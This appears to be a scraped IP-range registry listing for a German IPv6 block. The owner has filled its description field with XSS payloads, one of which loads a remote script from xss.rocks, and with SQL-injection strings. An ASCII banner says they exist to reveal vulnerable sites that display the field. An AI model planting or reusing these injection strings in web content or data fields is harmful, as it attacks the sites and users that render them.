2a0f:5707:ffe0:: โ 2a0f:5707:ffe3:ffff:ffff:ffff:ffff:ffff |
</textarea><script>alert(location.href,"XSS! FUX IT.")</script>
<script src=http://xss.rocks/xss.js></script>
<img src="javascript:alert('XSS! FUX IT.');">
<img src="o" onerror="alert('XSS! FUX IT.')"></img>
' -- OR 1 = 1 AND 'SQLi' = 'SQLi'
" -- OR 1 = 1 AND 'SQLi' = 'SQLi'
` -- OR 1 = 1 AND 'SQLi' = 'SQLi'
<svg onload=alert%26%230000000040"XSS! FUX IT")>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'>
<IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')>
<IMG SRC=`javascript:alert("XSS! FUX IT")`>
<IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC= onmouseover="alert('xxs')">
<img src=x onerror="& # 0000106avascript:alert('XSS')">
<IMG SRC=& # 106;avascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS! FUX IT');">
.----------------. .----------------. .----------------.
| .--------------. | | .--------------. | | .--------------. |
| | ____ ____ | | | | _______ | | | | _______ | |
| | |_ _||_ _| | | | | / ___ | | | | | / ___ | | |
| | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | |
| | > `' < | | | | '.___`-. | | | | '.___`-. | |
| | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | |
| | |____||____| | | | | |_______.' | | | | |_______.' | |
| | | | | | | | | | | |
| '--------------' | | '--------------' | | '--------------' |
'----------------' '----------------' '----------------'
|--------------------------------*---------------------------------|
| Hello there! |
| Maybe you saw these texts in descr. |
| These texts are used to test XSS vulnerability in website :) |
| If you see the alert which said 'XSS' or something, |
| then maybe the website you are looking at is vulnerable, |
| please contact the website owner to fix this :). |
| (By the way, there has a SQL injection test too.) |
| |
| Contact me : noc at sciuridae.network |
|------------------------------------------------------------------|
|
Germany
|
2a0f:5707:ffe0::/46
|
282 |